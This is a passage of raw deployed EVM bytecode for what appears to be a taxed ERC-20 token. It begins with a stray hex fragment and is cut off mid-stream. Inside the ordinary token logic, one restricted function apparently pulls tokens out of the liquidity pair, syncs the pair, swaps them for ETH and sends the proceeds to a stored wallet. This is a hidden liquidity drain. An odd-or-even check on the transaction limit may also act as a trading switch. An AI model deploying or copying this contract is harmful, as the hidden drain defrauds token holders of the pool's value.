998cb86b7bdeae2f9c3aa1664736f6c63430008100033

Deployed Bytecode

0x60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fb9565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fb9565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ed8565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cf1565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614000565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ed8565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ed8565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190614093565b611a37565b6040516108f89190613e07565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a906143ec565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b60606004805461187390614142565b80601f016020809104026020016040519081016040528092919081815260200182805461189f90614142565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a149061447e565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad6919061423d565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f906144ea565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b729061453b565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ecc565b8461342191906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f17565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614f8a565b816001815181106135ed576135ec614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150b0565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061453b565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b811